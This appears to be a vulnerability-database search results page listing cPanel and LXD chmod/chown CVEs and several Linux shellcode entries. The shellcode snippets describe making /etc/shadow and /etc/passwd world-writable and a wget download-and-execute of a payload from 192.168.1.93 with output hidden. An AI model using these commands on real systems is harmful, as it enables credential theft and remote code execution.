754 matches found
CVE-2017-18450
cPanel before 64.0.21 allows certain file-chmod operations via /scripts/convertroundcubemysql2sqlite SEC-255...
Code injection
cPanel before 64.0.21 allows certain file-chmod operations via /scripts/convertroundcubemysql2sqlite SEC-255...
CVE-2017-18450
cPanel before 64.0.21 allows certain file-chmod operations via /scripts/convertroundcubemysql2sqlite SEC-255...
CVE-2017-18450
CVE-2017-18450 affects cPanel prior to 64.0.21 and is associated with file-chmod operations via the script /scripts/convert_roundcube_mysql2sqlite (SEC-255). The vulnerability is documented across multiple sources (NVD, Red Hat, CVE lists) as allowing certain file permission changes and has CVSS ...
CVE-2016-10849
cPanel before 11.54.0.4 allows certain file-chmod operations in scripts/secureit SEC-82...
CVE-2016-10846
cPanel before 11.54.0.4 allows arbitrary file-chown and file-chmod operations during Roundcube database conversions SEC-79...
Code injection
cPanel before 11.54.0.4 allows certain file-chmod operations in scripts/secureit SEC-82...
CVE-2016-10846
CVE-2016-10846 affects cPanel prior to 11.54.0.4, enabling arbitrary file-chown and file-chmod operations during Roundcube database conversions (SEC-79). The issue is rooted in the Roundcube database conversion process and allows limited privileges to perform file ownership and permission changes...
CVE-2016-10849
cPanel before 11.54.0.4 allows certain file-chmod operations in scripts/secureit SEC-82...
CVE-2016-10849
CVE-2016-10849 affects cPanel before 11.54.0.4, where file-chmod operations in scripts/secureit (SEC-82) can be abused. Connected documents confirm the affected product/version and the specific component (scripts/secureit) with an integrity impact (I:H in CVSS3) and a network vector with low atta...
CVE-2018-20909
cPanel before 70.0.23 allows arbitrary file-chmod operations during legacy incremental backups SEC-338...
CVE-2018-20909
cPanel before 70.0.23 allows arbitrary file-chmod operations during legacy incremental backups SEC-338...
Code injection
cPanel before 70.0.23 allows arbitrary file-chmod operations during legacy incremental backups SEC-338...
CVE-2018-20909
cPanel before 70.0.23 allows arbitrary file-chmod operations during legacy incremental backups SEC-338...
CVE-2018-20909
CVE-2018-20909 affects cPanel prior to 70.0.23, where arbitrary file-chmod operations can occur during legacy incremental backups (SEC-338). Multiple sources (NVD, Red Hat advisory, CNVD) confirm the issue and link it to cPanel’s backup handling. The vulnerability arises in the backup process, en...
Linux/x86 chmod(/etc/shadow, 0666) Polymorphic Shellcode (53 bytes)
---------------------- DESCRIPTION ------------------------------------- ; Title: chmod“/etc/shadow”, 0666 and exit for Linux/x86 - Polymorphic ; Author: Daniel Ortiz ; Tested on: Linux 4.18.0-25-generic 26 Ubuntu ; Size: 53 bytes ; SLAE ID: PA-9844 ---------------------- ASM CODE...
Linux/x86_64 - Wget Linux Enumeration Script Shellcode (155 Bytes)
/ LinEnum Linux Enumeration Wget & CHMOD & Run Shellcode Language C & ASM - Linux/x8664 author : Kağan Çapar contact: email protected shellcode len : 155 bytes compilation: gcc -o shellcode shellcode.c test: run ./shellcode description: First, the linenum script is via github with wget command...
Linux/x86 - chmod 666 /etc/passwd & chmod 666 /etc/shadow Shellcode (61 bytes)
Exploit Title: Linux/x86 - chmod 666 /etc/passwd & chmod 666 /etc/shadow 61 bytes Date: 10/07/2019 Exploit Author: Xavier Invers Fornells Contact: email protected Tested on: Debian 4.19.28 Architecture: x86 Size: 61 bytes chmod.nasm global start section .text start: push byte 15 pop eax push byte...
Linux/x86 - Chmod + Execute (/usr/bin/wget 192.168.1.93//x) Hide Output Shellcode (129 bytes)
Linux/x86 - Chmod + Execute /usr/bin/wget http://192.168.1.93//x + Hide Output Shellcode 129 bytes / ; Shellcode 129 Bytes ; download via wget + chmod + execute shellcode + hide output ; Exec: /usr/bin/wget http://192.168.1.93//x /dev/null 2&1 ; global start section .text start: ;fork xor eax,eax...
Design/Logic Flaw
LXD before version 0.19-0ubuntu5 doUidshiftIntoContainer has an unsafe Chmod call that races against the stat in the Filepath.Walk function. A symbolic link created in that window could cause any file on the system to have any mode of the attacker's choice...